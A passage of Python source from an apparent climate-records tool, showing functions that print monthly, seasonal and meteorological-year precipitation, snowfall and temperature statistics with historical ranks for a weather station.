Snowiest".format(rank(snowdeschist.index(round(sum(clmt[y]["snow"]),1))+1)),end="") try: print(", Rank: {} Least-Snowiest".format(rank(snowaschist.index(round(sum(clmt[y]["snow"]),1))+1))) if clmt[y]["recordqty"] > excludeyear and snowaschist.index(round(sum(clmt[y]["snow"]),1)) <= snowdeschist.index(round(sum(clmt[y]["snow"]),1)) else print("") except: print("") if round(sum(clmt[y]["snow"]),1) > 0: print(" -- Highest Daily Snow: {}".format(clmt[y]["snowPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y]["snowPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["snowPROP"]["day_max"][1][len(clmt[y]["snowPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) print(" Total Snow Days (>=T): {}".format(clmt[y]["snowDAYS"]),end="") try: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(clmt[y]["snowDAYS"])+1)),end="") if clmt[y]["snowDAYS"] > 0 and snowDAYSdeschist.index(clmt[y]["snowDAYS"]) <= snowDAYSaschist.index(clmt[y]["snowDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(clmt[y]["snowDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(snowDAYSaschist.index(clmt[y]["snowDAYS"])+1))) if clmt[y]["recordqty"] > excludeyear and snowDAYSaschist.index(clmt[y]["snowDAYS"]) <= snowDAYSdeschist.index(clmt[y]["snowDAYS"]) else print("") except: print("") if clmt[y]["snwdDAYS"] > 0: print(" Total Days w/Snow on the Ground (>=T): {}".format(clmt[y]["snwdDAYS"]),end="") try: print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(clmt[y]["snwdDAYS"])+1)),end="") if clmt[y]["snwdDAYS"] > 0 and snwdDAYSdeschist.index(clmt[y]["snwdDAYS"]) <= snwdDAYSaschist.index(clmt[y]["snwdDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(clmt[y]["snwdDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(snwdDAYSaschist.index(clmt[y]["snwdDAYS"])+1))) if clmt[y]["recordqty"] > excludeyear and snwdDAYSaschist.index(clmt[y]["snwdDAYS"]) <= snwdDAYSdeschist.index(clmt[y]["snwdDAYS"]) else print("") except: print("") if round(sum(clmt[y]["snwd"]),1) > 0: print(" -- Highest Daily Snow-Depth: {}".format(clmt[y]["snwdPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y]["snwdPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["snwdPROP"]["day_max"][1][len(clmt[y]["snwdPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) try: print(" Average Temperature: {}".format(round(mean(clmt[y]["tempAVGlist"]),1)),end="") print(", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(clmt[y]["tempAVGlist"]),1))+1)),end="") if len(clmt[y]["tempAVGlist"]) > excludeyear*2 and tavgdeschist.index(round(mean(clmt[y]["tempAVGlist"]),1)) <= tavgaschist.index(round(mean(clmt[y]["tempAVGlist"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(clmt[y]["tempAVGlist"]),1))+1))) if len(clmt[y]["tempAVGlist"]) > excludeyear*2 and tavgaschist.index(round(mean(clmt[y]["tempAVGlist"]),1)) <= tavgdeschist.index(round(mean(clmt[y]["tempAVGlist"]),1)) else print("") except: print(" Average Temperature: N/A") try: print(" Avg MAX Temperature: {}".format(round(mean(clmt[y]["tmax"]),1)),end="") print(", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(clmt[y]["tmax"]),1))+1)),end="") if len(clmt[y]["tmax"]) > excludeyear and tmaxdeschist.index(round(mean(clmt[y]["tmax"]),1)) <= tmaxaschist.index(round(mean(clmt[y]["tmax"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tmaxaschist.index(round(mean(clmt[y]["tmax"]),1))+1))) if len(clmt[y]["tmax"]) > excludeyear and tmaxaschist.index(round(mean(clmt[y]["tmax"]),1)) <= tmaxdeschist.index(round(mean(clmt[y]["tmax"]),1)) else print("") except: print(" Avg MAX Temperature: N/A") if clmt[y]["tmaxPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMAX: {}".format(clmt[y]["tmaxPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y]["tmaxPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["tmaxPROP"]["day_max"][1][len(clmt[y]["tmaxPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if clmt[y]["tmaxPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMAX: {}".format(clmt[y]["tmaxPROP"]["day_min"][0]),end = " ::: ") for x in clmt[y]["tmaxPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["tmaxPROP"]["day_min"][1][len(clmt[y]["tmaxPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) try: print(" Avg MIN Temperature: {}".format(round(mean(clmt[y]["tmin"]),1)),end="") print(", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(clmt[y]["tmin"]),1))+1)),end="") if len(clmt[y]["tmin"]) > excludeyear and tmindeschist.index(round(mean(clmt[y]["tmin"]),1)) <= tminaschist.index(round(mean(clmt[y]["tmin"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tminaschist.index(round(mean(clmt[y]["tmin"]),1))+1))) if len(clmt[y]["tmin"]) > excludeyear and tminaschist.index(round(mean(clmt[y]["tmin"]),1)) <= tmindeschist.index(round(mean(clmt[y]["tmin"]),1)) else print("") except: print(" Avg MIN Temperature: N/A") if clmt[y]["tminPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMIN: {}".format(clmt[y]["tminPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y]["tminPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["tminPROP"]["day_max"][1][len(clmt[y]["tminPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if clmt[y]["tminPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMIN: {}".format(clmt[y]["tminPROP"]["day_min"][0]),end = " ::: ") for x in clmt[y]["tminPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["tminPROP"]["day_min"][1][len(clmt[y]["tminPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) if all(len(x) == 0 for x in [clmt[y]["tempAVGlist"],clmt[y]["tmax"],clmt[y]["tmin"]]): print("*** No Reliable Temperature Data for {} {}".format(calendar.month_abbr,y)) print("-----") def seasonStats(y,season): """Report on recorded statistics for a meteorological season of interest from a specific year. It accepts only arguments for the inquired year, and season. The year must be an integer while the season must be in string format. seasonStats(YYYY,SEASON) EXAMPLE: seasonStats(1933,"winter") -> Returns a printout of stats from the Meteorological Winter of 1933 (inclusive of December 1933 - February of 1934) """ if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") if y not in metclmt: return print("Meteorological Year {} Not Found! Try again!".format(y)) if season.lower() not in ["spring","summer","fall","autumn","winter"]: return print("'{}' is not a valid season. Try again!".format(season)) if season.lower() == "autumn": season = "fall" season = season.lower() # Puts season into requisite lower case to match metclmt[y] season dictionaries m1 = metclmt[y][season]["valid"][0] m2 = metclmt[y][season]["valid"][1] m3 = metclmt[y][season]["valid"][2] prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist = seasonRank(season,"temp",5,seasonStatsRun=True) #for x in [prcpaschist, prcpdeschist, snowaschist, snowdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist]: print(len(x)) #for x in [prcpaschist, prcpdeschist, snowaschist, snowdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist]: print(x) try: snwdDAYSdeschist = sorted(set(list(metclmt[YR][season]["snwdDAYS"] for YR in [Y for Y in metclmt if type(Y) == int] if metclmt[YR][season]["snwdDAYS"] != 0)),reverse=True) snwdDAYSaschist = sorted(set(list(metclmt[YR][season]["snwdDAYS"] for YR in [Y for Y in metclmt if type(Y) == int] if metclmt[YR][season]["recordqty"] > excludeyear))) except Exception as e: print(e) print("{:-^40}".format("")) if season == "winter": print("{:^40}".format("Seasonal Statistics for Meteorological {} {}-{}".format(season.capitalize(),y,str(y+1)[2:]))) else: print("{:^40}".format("Seasonal Statistics for Meteorological {} {}".format(season.capitalize(),y))) print("{:^40}".format("{}: {}".format(metclmt["station"],metclmt["station_name"]))) print("{:^40}".format("Quantity of Records: {}".format(metclmt[y][season]["recordqty"]))) if metclmt[y][season]["recordqty"] <= excludeseason: print("{:-^40}".format("")) print("*** SEASONAL STATS LIKELY NOT COMPLETE FOR RELIANCE ON STATISTICS ***") print("{:-^40}".format("")) # metclmt[YYYY][s]["valid"] = [3,4,5] print("{:^6}|{:^10}|{:^10}|{:^10}|".format( "", "{} {}".format(calendar.month_abbr[m1].upper(),y) if m1 in [3,4,5,6,7,8,9,10,11,12] else "{} {}".format(calendar.month_abbr[m1].upper(),y+1), "{} {}".format(calendar.month_abbr[m2].upper(),y) if m2 in [3,4,5,6,7,8,9,10,11,12] else "{} {}".format(calendar.month_abbr[m2].upper(),y+1), "{} {}".format(calendar.month_abbr[m3].upper(),y) if m3 in [3,4,5,6,7,8,9,10,11,12] else "{} {}".format(calendar.month_abbr[m3].upper(),y+1) )) print("{:^6}|{:>8} |{:>8} |{:>8} |".format( "PRCP", "{:.2f}".format(round(sum(metclmt[y][m1]["prcp"]),2)) if m1 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][m2]["prcp"]),2)) if m2 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][m3]["prcp"]),2)) if m3 in metclmt[y] else "" )) print("{:^6}|{:>8} |{:>8} |{:>8} |".format( "SNOW", "{:.1f}".format(round(sum(metclmt[y][m1]["snow"]),1)) if m1 in metclmt[y] and (sum(metclmt[y][m1]["snow"]) > 0 or metclmt[y][m1]["snowDAYS"] > 0) else (" -- " if m1 in metclmt[y] and sum(metclmt[y][m1]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][m2]["snow"]),1)) if m2 in metclmt[y] and (sum(metclmt[y][m2]["snow"]) > 0 or metclmt[y][m2]["snowDAYS"] > 0) else (" -- " if m2 in metclmt[y] and sum(metclmt[y][m2]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][m3]["snow"]),1)) if m3 in metclmt[y] and (sum(metclmt[y][m3]["snow"]) > 0 or metclmt[y][m3]["snowDAYS"] > 0) else (" -- " if m3 in metclmt[y] and sum(metclmt[y][m3]["snow"]) == 0 else "") )) print("{:^6}|{:>8} |{:>8} |{:>8} |".format( "TAVG", "{:.1f}".format(round(mean(metclmt[y][m1]["tempAVGlist"]),1)) if m1 in metclmt[y] and len(metclmt[y][m1]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][m2]["tempAVGlist"]),1)) if m2 in metclmt[y] and len(metclmt[y][m2]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][m3]["tempAVGlist"]),1)) if m3 in metclmt[y] and len(metclmt[y][m3]["tempAVGlist"]) > 2 else "" )) print("{:^6}|{:>8} |{:>8} |{:>8} |".format( "TMAX", "{:.1f}".format(round(mean(metclmt[y][m1]["tmax"]),1)) if m1 in metclmt[y] and len(metclmt[y][m1]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][m2]["tmax"]),1)) if m2 in metclmt[y] and len(metclmt[y][m2]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][m3]["tmax"]),1)) if m3 in metclmt[y] and len(metclmt[y][m3]["tmax"]) > 1 else "" )) print("{:^6}|{:>8} |{:>8} |{:>8} |".format( "TMIN", "{:.1f}".format(round(mean(metclmt[y][m1]["tmin"]),1)) if m1 in metclmt[y] and len(metclmt[y][m1]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][m2]["tmin"]),1)) if m2 in metclmt[y] and len(metclmt[y][m2]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][m3]["tmin"]),1)) if m3 in metclmt[y] and len(metclmt[y][m3]["tmin"]) > 1 else "" )) print("{:-^40}".format("")) print(" Total Precipitation: {}".format(round(sum(metclmt[y][season]["prcp"]),2)),end="") try: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(metclmt[y][season]["prcp"]),2))+1)),end="") if sum(metclmt[y][season]["prcp"]) > 0 and prcpdeschist.index(round(sum(metclmt[y][season]["prcp"]),2)) <= prcpaschist.index(round(sum(metclmt[y][season]["prcp"]),2)) else print("",end="") except: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(metclmt[y][season]["prcp"]),2))+1)),end="") try: print(", Rank: {} Driest".format(rank(prcpaschist.index(round(sum(metclmt[y][season]["prcp"]),2))+1))) if metclmt[y][season]["recordqty"] > excludeseason and prcpaschist.index(round(sum(metclmt[y][season]["prcp"]),2)) <= prcpdeschist.index(round(sum(metclmt[y][season]["prcp"]),2)) else print("") except: print("") print(" Total Precipitation Days (>=T): {}".format(metclmt[y][season]["prcpDAYS"]),end="") try: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(metclmt[y][season]["prcpDAYS"])+1)),end="") if metclmt[y][season]["prcpDAYS"] > 0 and prcpDAYSdeschist.index(metclmt[y][season]["prcpDAYS"]) <= prcpDAYSaschist.index(metclmt[y][season]["prcpDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(metclmt[y][season]["prcpDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(prcpDAYSaschist.index(metclmt[y][season]["prcpDAYS"])+1))) if prcpDAYSaschist.index(metclmt[y][season]["prcpDAYS"]) <= prcpDAYSdeschist.index(metclmt[y][season]["prcpDAYS"]) else print("") except: print("") if round(sum(metclmt[y][season]["prcp"]),2) > 0: print(" -- Highest Daily Precip: {}".format(metclmt[y][season]["prcpPROP"]["day_max"][0]),end=" ::: ") for x in range(len(metclmt[y][season]["prcpPROP"]["day_max"][1])): if x != len(metclmt[y][season]["prcpPROP"]["day_max"][1])-1: print("{},".format(metclmt[y][season]["prcpPROP"]["day_max"][1][x].daystr),end=" ") else: print("{}".format(metclmt[y][season]["prcpPROP"]["day_max"][1][x].daystr)) if round(sum(metclmt[y][season]["snow"]),1) > 0 or metclmt[y][season]["snowDAYS"] > 0: print(" Total Snow: {}".format(round(sum(metclmt[y][season]["snow"]),1)),end="") try: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(metclmt[y][season]["snow"]),1))+1)),end="") if sum(metclmt[y][season]["snow"]) > 0 and snowdeschist.index(round(sum(metclmt[y][season]["snow"]),1)) <= snowaschist.index(round(sum(metclmt[y][season]["snow"]),1)) else print("",end="") except: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(metclmt[y][season]["snow"]),1))+1)),end="") try: print(", Rank: {} Least-Snowiest".format(rank(snowaschist.index(round(sum(metclmt[y][season]["snow"]),1))+1))) if metclmt[y][season]["recordqty"] > excludeseason and snowaschist.index(round(sum(metclmt[y][season]["snow"]),1)) <= snowdeschist.index(round(sum(metclmt[y][season]["snow"]),1)) else print("") except: print("") print(" Total Snow Days (>=T): {}".format(metclmt[y][season]["snowDAYS"]),end="") try: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"])+1)),end="") if metclmt[y][season]["snowDAYS"] > 0 and snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"]) <= snowDAYSaschist.index(metclmt[y][season]["snowDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(snowDAYSaschist.index(metclmt[y][season]["snowDAYS"])+1))) if metclmt[y][season]["recordqty"] > excludeseason and snowDAYSaschist.index(metclmt[y][season]["snowDAYS"]) <= snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"]) else print("") except: print("") if metclmt[y][season]["snowPROP"]["day_max"][0] > 0: print(" -- Highest Daily Snow: {}".format(metclmt[y][season]["snowPROP"]["day_max"][0]),end=" ::: ") for x in range(len(metclmt[y][season]["snowPROP"]["day_max"][1])): if x != len(metclmt[y][season]["snowPROP"]["day_max"][1])-1: print("{},".format(metclmt[y][season]["snowPROP"]["day_max"][1][x].daystr),end=" ") else: print("{}".format(metclmt[y][season]["snowPROP"]["day_max"][1][x].daystr)) print(" Total Snow Days (>=T): {}".format(metclmt[y][season]["snowDAYS"]),end="") try: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"])+1)),end="") if metclmt[y][season]["snowDAYS"] > 0 and snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"]) <= snowDAYSaschist.index(metclmt[y][season]["snowDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(snowDAYSaschist.index(metclmt[y][season]["snowDAYS"])+1))) if metclmt[y][season]["recordqty"] > excludeyear and snowDAYSaschist.index(metclmt[y][season]["snowDAYS"]) <= snowDAYSdeschist.index(metclmt[y][season]["snowDAYS"]) else print("") except: print("") if metclmt[y][season]["snwdDAYS"] > 0: print(" Total Days w/Snow on the Ground (>=T): {}".format(metclmt[y][season]["snwdDAYS"]),end="") try: print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(metclmt[y][season]["snwdDAYS"])+1)),end="") if metclmt[y][season]["snwdDAYS"] > 0 and snwdDAYSdeschist.index(metclmt[y][season]["snwdDAYS"]) <= snwdDAYSaschist.index(metclmt[y][season]["snwdDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(snwdDAYSdeschist.index(metclmt[y][season]["snwdDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(snwdDAYSaschist.index(metclmt[y][season]["snwdDAYS"])+1))) if metclmt[y][season]["recordqty"] > excludeyear and snwdDAYSaschist.index(metclmt[y][season]["snwdDAYS"]) <= snwdDAYSdeschist.index(metclmt[y][season]["snwdDAYS"]) else print("") except: print("") if round(sum(metclmt[y][season]["snwd"]),1) > 0: print(" -- Highest Daily Snow-Depth: {}".format(metclmt[y][season]["snwdPROP"]["day_max"][0]),end = " ::: ") for x in metclmt[y][season]["snwdPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y][season]["snwdPROP"]["day_max"][1][len(metclmt[y][season]["snwdPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if len(metclmt[y][season]["tempAVGlist"]) <= excludeseason_tavg and metclmt[y][season]["recordqty"] > excludeseason: print("{:-^55}".format("")) print("*** INSUFFICIENT TEMPERATURE DATA FOR SEASON LIKELY ***") print("{:-^55}".format("")) try: print(" Average Temperature: {}".format(round(mean(metclmt[y][season]["tempAVGlist"]),1)),end="") print(", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1))+1)),end="") if len(metclmt[y][season]["tempAVGlist"]) > excludeseason*2 and tavgdeschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1)) <= tavgaschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1))+1))) if len(metclmt[y][season]["tempAVGlist"]) > excludeseason*2 and tavgaschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1)) <= tavgdeschist.index(round(mean(metclmt[y][season]["tempAVGlist"]),1)) else print("") except: print(" Average Temperature: N/A") try: print(" Avg MAX Temperature: {}".format(round(mean(metclmt[y][season]["tmax"]),1)),end="") print(", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(metclmt[y][season]["tmax"]),1))+1)),end="") if len(metclmt[y][season]["tmax"]) > excludeseason and tmaxdeschist.index(round(mean(metclmt[y][season]["tmax"]),1)) <= tmaxaschist.index(round(mean(metclmt[y][season]["tmax"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tmaxaschist.index(round(mean(metclmt[y][season]["tmax"]),1))+1))) if len(metclmt[y][season]["tmax"]) > excludeseason and tmaxaschist.index(round(mean(metclmt[y][season]["tmax"]),1)) <= tmaxdeschist.index(round(mean(metclmt[y][season]["tmax"]),1)) else print("") except: print(" Avg MAX Temperature: N/A") if metclmt[y][season]["tmaxPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMAX: {}".format(metclmt[y][season]["tmaxPROP"]["day_max"][0]),end = " ::: ") for x in metclmt[y][season]["tmaxPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y][season]["tmaxPROP"]["day_max"][1][len(metclmt[y][season]["tmaxPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if metclmt[y][season]["tmaxPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMAX: {}".format(metclmt[y][season]["tmaxPROP"]["day_min"][0]),end = " ::: ") for x in metclmt[y][season]["tmaxPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y][season]["tmaxPROP"]["day_min"][1][len(metclmt[y][season]["tmaxPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) try: print(" Avg MIN Temperature: {}".format(round(mean(metclmt[y][season]["tmin"]),1)),end="") print(", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(metclmt[y][season]["tmin"]),1))+1)),end="") if len(metclmt[y][season]["tmin"]) > excludeseason and tmindeschist.index(round(mean(metclmt[y][season]["tmin"]),1)) <= tminaschist.index(round(mean(metclmt[y][season]["tmin"]),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tminaschist.index(round(mean(metclmt[y][season]["tmin"]),1))+1))) if len(metclmt[y][season]["tmin"]) > excludeseason and tminaschist.index(round(mean(metclmt[y][season]["tmin"]),1)) <= tmindeschist.index(round(mean(metclmt[y][season]["tmin"]),1)) else print("") except: print(" Avg MIN Temperature: N/A") if metclmt[y][season]["tminPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMIN: {}".format(metclmt[y][season]["tminPROP"]["day_max"][0]),end = " ::: ") for x in metclmt[y][season]["tminPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y][season]["tminPROP"]["day_max"][1][len(metclmt[y][season]["tminPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if metclmt[y][season]["tminPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMIN: {}".format(metclmt[y][season]["tminPROP"]["day_min"][0]),end = " ::: ") for x in metclmt[y][season]["tminPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != metclmt[y][season]["tminPROP"]["day_min"][1][len(metclmt[y][season]["tminPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) print("-----") def metYearStats(y): """Report on recorded statistics for a meteorological year of interest. It only accepts an argument for the inquired year. Meteorological years run from March to February of the following year (Spring to Winter).The year must be an integer. metYearStats(YYYY) EXAMPLE: metYearStats(1985) -> Returns a printout of stats from the Meteorological Year of 1985 (inclusive of March 1985 - February of 1986) """ if len(metclmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") if y not in metclmt: return print("* A record for {} not found in metclmt *".format(y)) prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist = metYearRank("temps",5,yearStatsRun=True) try: snwdDAYSdeschist = sorted(set(list(metclmt[YR]["snwdDAYS"] for YR in [Y for Y in metclmt if type(Y) == int] if metclmt[YR]["snwdDAYS"] != 0)),reverse=True) snwdDAYSaschist = sorted(set(list(metclmt[YR]["snwdDAYS"] for YR in [Y for Y in metclmt if type(Y) == int] if metclmt[YR]["recordqty"] > excludeyear))) except Exception as e: print(e) print("") print("{:^73}".format("Statistics for Meteorological Year {}".format(y))) print("{:^73}".format("{}: {}".format(clmt["station"],clmt["station_name"]))) print("{:^73}".format("Quantity of Records: {}".format(clmt[y]["recordqty"]))) if metclmt[y]["recordqty"] <= excludeyear: print("{:-^73}".format("")) print("*** MET. YEAR STATS MAY NOT BE COMPLETE FOR RELIANCE ON STATISTICS ***") print("{:-^73}".format("")) print("{:^6}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|{:^10}|".format("","MAR {}".format(y),"APR {}".format(y),"MAY {}".format(y),"JUN {}".format(y),"JUL {}".format(y),"AUG {}".format(y))) print("{:-^73}".format("")) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "PRCP", "{:.2f}".format(round(sum(metclmt[y][3]["prcp"]),2)) if 3 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][4]["prcp"]),2)) if 4 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][5]["prcp"]),2)) if 5 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][6]["prcp"]),2)) if 6 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][7]["prcp"]),2)) if 7 in metclmt[y] else "", "{:.2f}".format(round(sum(metclmt[y][8]["prcp"]),2)) if 8 in metclmt[y] else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "SNOW", "{:.1f}".format(round(sum(metclmt[y][3]["snow"]),1)) if 3 in metclmt[y] and (sum(metclmt[y][3]["snow"]) > 0 or metclmt[y][3]["snowDAYS"] > 0) else (" -- " if 3 in metclmt[y] and sum(metclmt[y][3]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][4]["snow"]),1)) if 4 in metclmt[y] and (sum(metclmt[y][4]["snow"]) > 0 or metclmt[y][4]["snowDAYS"] > 0) else (" -- " if 4 in metclmt[y] and sum(metclmt[y][4]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][5]["snow"]),1)) if 5 in metclmt[y] and (sum(metclmt[y][5]["snow"]) > 0 or metclmt[y][5]["snowDAYS"] > 0) else (" -- " if 5 in metclmt[y] and sum(metclmt[y][5]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][6]["snow"]),1)) if 6 in metclmt[y] and (sum(metclmt[y][6]["snow"]) > 0 or metclmt[y][6]["snowDAYS"] > 0) else (" -- " if 6 in metclmt[y] and sum(metclmt[y][6]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][7]["snow"]),1)) if 7 in metclmt[y] and (sum(metclmt[y][7]["snow"]) > 0 or metclmt[y][7]["snowDAYS"] > 0) else (" -- " if 7 in metclmt[y] and sum(metclmt[y][7]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(metclmt[y][8]["snow"]),1)) if 8 in metclmt[y] and (sum(metclmt[y][8]["snow"]) > 0 or metclmt[y][8]["snowDAYS"] > 0) else (" -- " if 8 in metclmt[y] and sum(metclmt[y][8]["snow"]) == 0 else ""), )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TAVG", "{:.1f}".format(round(mean(metclmt[y][3]["tempAVGlist"]),1)) if 3 in metclmt[y] and len(metclmt[y][3]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][4]["tempAVGlist"]),1)) if 4 in metclmt[y] and len(metclmt[y][4]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][5]["tempAVGlist"]),1)) if 5 in metclmt[y] and len(metclmt[y][5]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][6]["tempAVGlist"]),1)) if 6 in metclmt[y] and len(metclmt[y][6]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][7]["tempAVGlist"]),1)) if 7 in metclmt[y] and len(metclmt[y][7]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(metclmt[y][8]["tempAVGlist"]),1)) if 8 in metclmt[y] and len(metclmt[y][8]["tempAVGlist"]) > 2 else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TMAX", "{:.1f}".format(round(mean(metclmt[y][3]["tmax"]),1)) if 3 in metclmt[y] and len(metclmt[y][3]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][4]["tmax"]),1)) if 4 in metclmt[y] and len(metclmt[y][4]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][5]["tmax"]),1)) if 5 in metclmt[y] and len(metclmt[y][5]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][6]["tmax"]),1)) if 6 in metclmt[y] and len(metclmt[y][6]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][7]["tmax"]),1)) if 7 in metclmt[y] and len(metclmt[y][7]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][8]["tmax"]),1)) if 8 in metclmt[y] and len(metclmt[y][8]["tmax"]) > 1 else "", )) print("{:^6}|{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |{:>8} |".format( "TMIN", "{:.1f}".format(round(mean(metclmt[y][3]["tmin"]),1)) if 3 in metclmt[y] and len(metclmt[y][3]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(metclmt[y][4]["tmin"]),1)) if 4 in 